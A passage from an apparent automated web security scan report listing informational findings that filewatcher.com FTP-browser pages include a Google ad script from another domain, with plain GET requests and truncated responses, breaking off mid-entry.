<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.801. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7w/tfdbs73Vm2ZLWD8boeg"
Content-Length: 5711
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 672
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/ - FT
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.802. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nU9TQmBxJbbi4V3QwAD6GQ"
Content-Length: 5569
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 676
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.803. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "blvDUvsPVdQEUjg3PY/8ZQ"
Content-Length: 5783
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 677
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.804. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "TIo7PLagRCyM6CpbM3Dr3g"
Content-Length: 7233
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 679
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.805. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "oXffTp+d/rEJ1/zeDZ8TwA"
Content-Length: 9720
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 677
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.806. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UaEea18oiR0XV8sif5T9Ug"
Content-Length: 27743
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 678
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.807. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD-Archive/ports/sparc64/packages-6.2-release/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HjInCKS2ULVV3OxfDNv03g"
Content-Length: 52274
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 682
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.808. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "B0RAB9cnjoQQFlID4J4meQ"
Content-Length: 14074
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.809. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:58 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "g1bWRbPFJMeBdjXQR9u05g"
Content-Length: 8543
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 685
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.810. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "y3tQ+F7TYkyukCQ5FSG8BA"
Content-Length: 8708
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.811. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IGbT16bb09qee1ic7kuRPA"
Content-Length: 26513
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 685
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.812. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0DolDVGU2GVF2Cnidv9a1g"
Content-Length: 37858
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.813. http://www.filewatcher.com/b/ftp/ftp.eenet.ee.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7t7uK/yix4gdfDzdWTOcrA"
Content-Length: 7117
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.814. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X0r1P2YgmoAHYnuzyGQ8jw"
Content-Length: 6204
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.815. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "1vT+JJqTbp8Ulq5tJKl8Bg"
Content-Length: 5463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 524
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/FreeBSD/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.816. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tMDhdltXsDcjD61OwopM0w"
Content-Length: 22320
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 525
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/FreeBSD/distfil
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.817. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/cpan.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kFFZ76UdMAnSJQQu8QKruA"
Content-Length: 11100
Cache-Control: max-age=604800
